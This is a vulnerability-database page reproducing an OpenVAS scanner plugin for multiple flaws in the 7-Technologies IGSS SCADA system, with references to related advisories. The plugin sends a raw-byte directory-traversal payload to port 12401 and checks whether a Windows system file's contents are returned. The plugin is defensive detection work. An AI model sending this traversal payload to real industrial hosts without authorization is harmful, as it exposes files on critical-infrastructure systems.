7T Interactive Graphical SCADA System Multiple Security Vulnerabilities
🗓️ 28 Mar 2011 00:00:00Reported by Copyright (C) 2011 Greenbone AGType
openvas🔗 plugins.openvas.org👁 44 Views
| Reporter | Title | Published | Views | Family All 29 |
|---|---|---|---|---|
| 7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer Stack Overflow | 16 May 201100:00 | – | zdt | |
| CVE-2011-1565 | 29 May 201815:50 | – | circl | |
| CVE-2011-1567 | 16 May 201100:00 | – | circl | |
| 7T Interactive Graphical SCADA System File Operations Buffer Overflows (CVE-2011-1567; CVE-2011-4050) | 15 May 201100:00 | – | checkpoint_advisories | |
| 7T Interactive Graphical SCADA System (IGSS) Directory Traversal (CVE-2011-1565) | 23 Aug 201100:00 | – | checkpoint_advisories | |
| CVE-2011-1565 | 5 Apr 201115:00 | – | cve | |
| CVE-2011-1567 | 5 Apr 201115:00 | – | cve | |
| CVE-2011-1565 | 5 Apr 201115:00 | – | cvelist | |
| CVE-2011-1567 | 5 Apr 201115:00 | – | cvelist | |
| 7-Technologies IGSS 9.00.00.11059 - Multiple Vulnerabilities | 22 Mar 201100:00 | – | exploitdb |
10
| Source | Link |
|---|---|
| aluigi | www.aluigi.org/adv/igss_7-adv.txt |
| aluigi | www.aluigi.org/adv/igss_1-adv.txt |
| securityfocus | www.securityfocus.com/bid/46936 |
| aluigi | www.aluigi.org/adv/igss_8-adv.txt |
| aluigi | www.aluigi.org/adv/igss_2-adv.txt |
| aluigi | www.aluigi.org/adv/igss_6-adv.txt |
| securityfocus | www.securityfocus.com/archive/1/517080 |
| exploit-db | www.exploit-db.com/exploits/17024/ |
| aluigi | www.aluigi.org/adv/igss_3-adv.txt |
| aluigi | www.aluigi.org/adv/igss_5-adv.txt |
10
# SPDX-FileCopyrightText: 2011 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.103128");
script_version("2025-04-15T05:54:49+0000");
script_tag(name:"last_modification", value:"2025-04-15 05:54:49 +0000 (Tue, 15 Apr 2025)");
script_tag(name:"creation_date", value:"2011-03-28 13:42:17 +0200 (Mon, 28 Mar 2011)");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_cve_id("CVE-2011-1565", "CVE-2011-1567");
script_name("7T Interactive Graphical SCADA System Multiple Security Vulnerabilities");
script_category(ACT_ATTACK);
script_family("General");
script_copyright("Copyright (C) 2011 Greenbone AG");
script_dependencies("find_service.nasl", "os_detection.nasl");
script_require_ports(12401);
script_mandatory_keys("Host/runs_windows");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/46936");
script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/517080");
script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/17300/");
script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/17024/");
script_xref(name:"URL", value:"http://aluigi.org/adv/igss_1-adv.txt");
script_xref(name:"URL", value:"http://aluigi.org/adv/igss_2-adv.txt");
script_xref(name:"URL", value:"http://aluigi.org/adv/igss_3-adv.txt");
script_xref(name:"URL", value:"http://aluigi.org/adv/igss_4-adv.txt");
script_xref(name:"URL", value:"http://aluigi.org/adv/igss_5-adv.txt");
script_xref(name:"URL", value:"http://aluigi.org/adv/igss_6-adv.txt");
script_xref(name:"URL", value:"http://aluigi.org/adv/igss_7-adv.txt");
script_xref(name:"URL", value:"http://aluigi.org/adv/igss_8-adv.txt");
script_tag(name:"summary", value:"7T Interactive Graphical SCADA System is prone to multiple security
vulnerabilities.");
script_tag(name:"impact", value:"Exploiting these issues may allow remote attackers to execute arbitrary
code within the context of the affected application or perform unauthorized actions using directory traversal strings.");
script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure of this
vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable
respective features, remove the product or replace the product by another one.");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"WillNotFix");
exit(0);
}
include("host_details.inc");
include("os_func.inc");
include("misc_func.inc");
include("traversal_func.inc");
port = 12401;
if( ! get_port_state( port ) )
exit( 0 );
soc = open_sock_tcp( port );
if( ! soc )
exit( 0 );
files = traversal_files( "Windows" );
foreach pattern( keys( files ) ) {
ex = raw_string( 0x9b, 0x00, 0x01, 0x00, 0x34, 0x12, 0x0d, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x03, 0x00, 0x00, 0x00 );
ex += crap( data:raw_string( 0x2e, 0x2e, 0x5c), length:48 );
file = files[pattern];
# nb: Workaround as egrep is not matching the response due to non printable characters in the response
pattern = str_replace( find:"\[", string:file, replace:"[" );
pattern = str_replace( find:"\]", string:file, replace:"]" );
pattern = str_replace( find:"supporT", string:file, replace:"support" );
ex += string( file );
ex += crap( data:raw_string( 0x00 ), length:77 );
send( socket:soc, data:ex );
res = recv( socket:soc, length:8072 );
if( pattern >< res ) {
close( soc );
security_message( port:port );
exit( 0 );
}
}
close( soc );
exit( 0 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Apr 2025 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 210
EPSS0.69618